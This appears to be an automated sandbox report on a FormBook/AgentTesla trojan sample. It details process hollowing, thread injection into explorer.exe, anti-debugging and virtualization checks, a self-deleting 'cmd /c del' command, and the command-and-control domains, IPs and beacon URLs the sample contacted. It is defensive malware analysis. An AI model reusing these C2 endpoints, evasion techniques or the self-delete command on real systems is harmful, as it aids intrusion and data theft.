          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473AAB0 mov eax, dword ptr fs:[00000030h]13_2_0473AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475FAB0 mov eax, dword ptr fs:[00000030h]13_2_0475FAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047252A5 mov eax, dword ptr fs:[00000030h]13_2_047252A5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00409B40 LdrLoadDll,7_2_00409B40
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.platinumcredit.net
          Source: C:\Windows\explorer.exeDomain query: www.thefullfledged.com
          Source: C:\Windows\explorer.exeDomain query: www.jakital.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.xcgtsret.com
          Source: C:\Windows\explorer.exeDomain query: www.suepersoldiers.com
          Source: C:\Windows\explorer.exeDomain query: www.arsels.info
          Source: C:\Windows\explorer.exeDomain query: www.electricatrick.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.219 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.204.216.132 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.151motors.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 1B0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"Jump to behavior
          Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000A.00000000.327891256.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.293464513.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.310106636.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.331243108.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000A.00000000.335912866.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.300895373.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.320269745.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528615 Sample: HkE0tD0g4NXKJfy.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 32 www.vupeliquid.com 2->32 34 www.nbtianzhou.com 2->34 36 vupeliquid.com 2->36 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 6 other signatures 2->54 11 HkE0tD0g4NXKJfy.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\user\...\HkE0tD0g4NXKJfy.exe.log, ASCII 11->30 dropped 66 Tries to detect virtualization through RDTSC time measurements 11->66 15 HkE0tD0g4NXKJfy.exe 11->15         started        signatures6 process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 Queues an APC in another process (thread injection) 15->74 18 explorer.exe 15->18 injected process9 dnsIp10 38 www.arsels.info 103.224.212.219, 49794, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 18->38 40 www.xcgtsret.com 18->40 42 12 other IPs or domains 18->42 56 System process connects to network (likely due to code injection or exploit) 18->56 22 msdt.exe 12 18->22         started        signatures11 process12 dnsIp13 44 www.jakital.com 22->44 46 AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com 22->46 58 Self deletion via cmd delete 22->58 60 Modifies the context of a thread in another process (thread injection) 22->60 62 Maps a DLL or memory area into another process 22->62 64 Tries to detect virtualization through RDTSC time measurements 22->64 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HkE0tD0g4NXKJfy.exe27%ReversingLabsWin32.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.jakital.com/0%Avira URL Cloudsafe
          http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G0%Avira URL Cloudsafe
          http://www.151motors.com/sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX0%Avira URL Cloudsafe
          http://www.suepersoldiers.com/sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX0%Avira URL Cloudsafe
          www.platinumcredit.net/sh5d/0%Avira URL Cloudsafe
          http://www.vupeliquid.com/sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX0%Avira URL Cloudsafe
          http://www.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX0%Avira URL Cloudsafe
          http://www.platinumcredit.net/sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX0%Avira URL Cloudsafe
          http://www.electricatrick.com/sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com
          		52.204.216.132
          		truefalse
            		high
            www.arsels.info
            		103.224.212.219
            		truetrue
              		unknown
              platinumcredit.net
              		34.102.136.180
              		truefalse
                		unknown
                electricatrick.com
                		34.102.136.180
                		truefalse
                  		unknown
                  151motors.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    vupeliquid.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      ghs.googlehosted.com
                      		142.250.203.115
                      		truefalse
                        		unknown
                        www.platinumcredit.net
                        		unknown
                        		unknowntrue
                          		unknown
                          www.thefullfledged.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.jakital.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.nbtianzhou.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.xcgtsret.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.151motors.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.suepersoldiers.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.vupeliquid.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.electricatrick.com
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.151motors.com/sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.suepersoldiers.com/sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          www.platinumcredit.net/sh5d/true
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.vupeliquid.com/sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQXtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.platinumcredit.net/sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.electricatrick.com/sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQXfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://www.jakital.com/msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3Gmsdt.exe, 0000000D.00000002.550810990.0000000000475000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpfalse
                                            		high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            142.250.203.115
                                            		ghs.googlehosted.comUnited States
                                            		15169GOOGLEUSfalse
                                            34.102.136.180
                                            		platinumcredit.netUnited States
                                            		15169GOOGLEUSfalse
                                            103.224.212.219
                                            		www.arsels.infoAustralia
                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                            52.204.216.132
                                            		AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comUnited States
                                            		14618AMAZON-AESUSfalse

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:528615
                                            Start date:25.11.2021
                                            Start time:15:07:14
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 40s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:HkE0tD0g4NXKJfy.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:25
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@13/4
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 13.5% (good quality ratio 11.8%)
                                            • Quality average: 71.7%
                                            • Quality standard deviation: 32.9%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 84
                                            • Number of non-executed functions: 152
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            15:08:09API Interceptor20x Sleep call for process: HkE0tD0g4NXKJfy.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            103.224.212.21911#U6708 16#U65e5 BL #U505a#U6cd5 SO NO J624 - #U9577#U5f91ISF DETAILS SO J624.exeGet hashmaliciousBrowse
                                            • www.packyssportsbarandgrill.com/mc6b/?jHED=q6vdABYGr50+mpTbDuVjH2bXmj77a7qtsiv5Ksob526EgQZJ7eJZqZTBsliO0pE1Rz7dNSx2ew==&oDK8=OXptnZkP0zeTKbFp
                                            Company Profile.exeGet hashmaliciousBrowse
                                            • www.alkalineup.info/dc02/?1bNDudv=+kLz+DEprIzY8U30IAWnamgEQgEGLSVbXudac2AKsepjAUwhwqfiCYTJlV+SA+9+XVAU&6lu=KlTl
                                            HIRE SOA NOV.exeGet hashmaliciousBrowse
                                            • www.hugolabin.com/i44q/?7n=YS1dnbOkNaCP7JrmT7p6ZNFgGouLE1kKb8gf8ths3Yir/LKnwdmfPmrhsMehp4wjvOL3&b8DdKN=_b9DpJ
                                            RFQ - 1100195199 - 1100190814.exeGet hashmaliciousBrowse
                                            • www.tattooof.info/nc26/?f48=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4MjdILtj65&4h50R=ABuLcpwXXr-
                                            November 2021 Update RFQ 3271737.exeGet hashmaliciousBrowse
                                            • www.tattooof.info/nc26/?SBZL=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4m8t4Lphy5&D48=c2MHtVyHNxCxXp7
                                            32vCkFTS0X.exeGet hashmaliciousBrowse
                                            • www.movieschor.info/qw2c/?gpt=rM2eMDGM2hRuqtSkQ+YMFWc5A7WJMLl7iFLKjR4Nu2Ciw4jbXpEUgw2kiN/aWqHDCAOD&g2=8pLpO
                                            #U570b#U5de8--#U6cf0#U91d1#U5bf6-EXW - ETC NOV. 5 - SO C360.exeGet hashmaliciousBrowse
                                            • www.packyssportsbarandgrill.com/mc6b/?Fb20Btg=q6vdABYGr50+mpTbDuVjH2bXmj77a7qtsiv5Ksob526EgQZJ7eJZqZTBsmOeoYYOWGSM&R0D49=XvrtZ8lP082
                                            RFQ - 1100195199 - 1100190914.exeGet hashmaliciousBrowse
                                            • www.tattooof.info/nc26/?k8GXjJk=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4MjdILtj65&9rhhPx=IL3h7ZC8a4ITG4S
                                            RFQ - 1100195199 - 1100190914.exeGet hashmaliciousBrowse
                                            • www.tattooof.info/nc26/?I2J=ChB31lYopjmOZG3U73N52YTWorj0brdWeOA+REOz+6bldw4+nA/cQmaLai4m8t4Lphy5&4hL0lT=KZIPBrwH1Nx4PpRp
                                            RFQ_PI02102110.exeGet hashmaliciousBrowse
                                            • www.decorationnews.com/rgv6/?p8eT=YMNzjXdfi635m3k1Gzxopc8L+wUwVg6cKWqi49UbKzMkwhAgUmt+0uJBtX6FQoP4iZ3i&C0=p4sD
                                            PO03214890.exeGet hashmaliciousBrowse
                                            • www.decorationnews.com/rgv6/?I6bdp0F=YMNzjXdfi635m3k1Gzxopc8L+wUwVg6cKWqi49UbKzMkwhAgUmt+0uJBtUW/TpjDhuWz+/MrzQ==&uN90=Wv0xlDNhhL
                                            20210812GLL_pdf.exeGet hashmaliciousBrowse
                                            • www.ptkvoice.com/zrmt/?iZG=ctrCe2mnbuueYdlFChD4/ovjSbegx+fsxvMp2r+zhNsJlDd5OS/NhYw/p1KrtWBZElqC&4hVP=u2JPvzz8
                                            SWIFT001411983HNK.exeGet hashmaliciousBrowse
